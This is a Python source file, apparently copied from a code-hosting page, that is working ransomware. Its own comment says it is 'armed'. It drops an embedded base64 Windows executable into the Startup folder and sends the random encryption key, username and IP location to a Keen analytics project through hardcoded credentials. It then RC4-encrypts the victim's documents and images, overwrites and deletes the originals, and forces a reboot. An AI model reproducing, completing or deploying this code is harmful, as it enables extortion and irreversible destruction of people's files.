133 lines
3.4 MiB
Python
133 lines
3.4 MiB
Python
|
|
||
|
|
debug = False #False = Ransomware is armed!
|
||
|
|
|
||
|
|
import time
|
||
|
|
import os, sys
|
||
|
|
import getpass
|
||
|
|
import base64
|
||
|
|
from Crypto import Random
|
||
|
|
import random, string
|
||
|
|
import shutil
|
||
|
|
import ctypes
|
||
|
|
|
||
|
|
test2exe = base64.b64decode("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
|
||
|
|
|
||
|
|
#
|
||
|
|
#
|
||
|
|
#
|
||
|
|
#
|
||
|
|
# Dont Scroll up!
|
||
|
|
#
|
||
|
|
#
|
||
|
|
#
|
||
|
|
|
||
|
|
|
||
|
|
def encrypt(data,key,skip=1024):
|
||
|
|
x = 0
|
||
|
|
box = range(256)
|
||
|
|
x = 0
|
||
|
|
for i in range(256):
|
||
|
|
x = (x + box[i] + ord(key[i % len(key)])) % 256
|
||
|
|
tmp = box[i]
|
||
|
|
tmp2 = box[x]
|
||
|
|
box[i] = box[x]
|
||
|
|
box[x] = tmp
|
||
|
|
x = 0
|
||
|
|
y = 0
|
||
|
|
out = []
|
||
|
|
if skip > 0:
|
||
|
|
for i in range(skip):
|
||
|
|
x = (x + 1) % 256
|
||
|
|
y = (y + box[x]) % 256
|
||
|
|
box[x], box[y] = box[y], box[x]
|
||
|
|
for char in data:
|
||
|
|
x = (x + 1) % 256
|
||
|
|
y = (y + box[x]) % 256
|
||
|
|
box[x], box[y] = box[y], box[x]
|
||
|
|
k = box[(box[x] + box[y]) % 256]
|
||
|
|
out.append(chr(ord(char) ^ k))
|
||
|
|
return ''.join(out)
|
||
|
|
|
||
|
|
f = open("C:\\Users\\"+getpass.getuser()+"\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\decrypt.exe", 'wb')
|
||
|
|
f.write(test2exe)
|
||
|
|
f.close()
|
||
|
|
|
||
|
|
length = 32
|
||
|
|
chars = string.ascii_letters + string.digits
|
||
|
|
random.seed = (os.urandom(1024) + Random.new().read(1024))
|
||
|
|
|
||
|
|
cryptKey = ''.join(random.choice(chars) for i in range(length))
|
||
|
|
|
||
|
|
import keen
|
||
|
|
keen.project_id = "57b37f2f80a7bd714c4f66d0"
|
||
|
|
keen.write_key = "f6e3537decd42999efaa57798b66df8aeb7cece04ae830e2c449a547ba629e6724e812fd7327cee0557d96c9bee474d127199290ecd9e3863ea67cf4963b8e02197133375d52d92e656f0490bfeaadf3004db0b1c85f1cfde1c81a9aadd2cc5d"
|
||
|
|
keen.add_event("key", {
|
||
|
|
"key": cryptKey,
|
||
|
|
"username": getpass.getuser(),
|
||
|
|
"ip_address":"${keen.ip}",
|
||
|
|
"keen":{
|
||
|
|
"addons":[{
|
||
|
|
"name":"keen:ip_to_geo",
|
||
|
|
"input":{"ip":"ip_address"},
|
||
|
|
"output":"ip_geo_info"}]}
|
||
|
|
})
|
||
|
|
|
||
|
|
def secureRemove(path, passes=1, accuracy=100):
|
||
|
|
if not os.path.exists(path):
|
||
|
|
return False
|
||
|
|
with open(path, "wb") as delfile:
|
||
|
|
length = delfile.tell()
|
||
|
|
for i in xrange(passes):
|
||
|
|
delfile.seek(0)
|
||
|
|
for byte in xrange(length):
|
||
|
|
if int(random.random()*100)<=accuracy:
|
||
|
|
delfile.write(str(random.randrange(256)))
|
||
|
|
|
||
|
|
|
||
|
|
fileTypes = ['.pdf', '.doc', '.docx', '.docm', '.pps', '.ppsx', '.ppt', '.pptx', '.pptm', '.ods', '.xls', '.xlsx', '.wps', '.odt','.3ds', '.max', '.png', '.jpg', '.jpeg']
|
||
|
|
|
||
|
|
if getpass.getuser() == "Dodox":
|
||
|
|
fileTypes = ['.cryptme']
|
||
|
|
if debug:
|
||
|
|
fileTypes = ['.cryptme']
|
||
|
|
|
||
|
|
print "Starting..."
|
||
|
|
orgFiel = ""
|
||
|
|
for root, directories, filenames in os.walk("C:\\Users\\"+getpass.getuser()):
|
||
|
|
for filename in filenames:
|
||
|
|
f = os.path.join(root,filename)
|
||
|
|
for typ in fileTypes:
|
||
|
|
if f.endswith(typ):
|
||
|
|
print "Found: "+f
|
||
|
|
try:
|
||
|
|
fd = open(f,"rb")
|
||
|
|
orgFile = fd.read()
|
||
|
|
fd.close()
|
||
|
|
|
||
|
|
fd = open(f+".crypt","wb")
|
||
|
|
fd.write(encrypt(orgFile,cryptKey))
|
||
|
|
fd.close()
|
||
|
|
secureRemove(f, 1, 1)
|
||
|
|
except:
|
||
|
|
print "[!] Error"
|
||
|
|
|
||
|
|
del cryptKey
|
||
|
|
|
||
|
|
time.sleep(5)
|
||
|
|
|
||
|
|
for root, directories, filenames in os.walk("C:\\Users\\"+getpass.getuser()):
|
||
|
|
for filename in filenames:
|
||
|
|
f = os.path.join(root,filename)
|
||
|
|
for typ in fileTypes:
|
||
|
|
if f.endswith(typ):
|
||
|
|
print "Deleting: "+f
|
||
|
|
try:
|
||
|
|
os.remove(f)
|
||
|
|
except:
|
||
|
|
print "[!] Error deleting"
|
||
|
|
|
||
|
|
if not debug:
|
||
|
|
time.sleep(5)
|
||
|
|
os.system("shutdown -r -t 0")
|
||
|
|
print "Done!"
|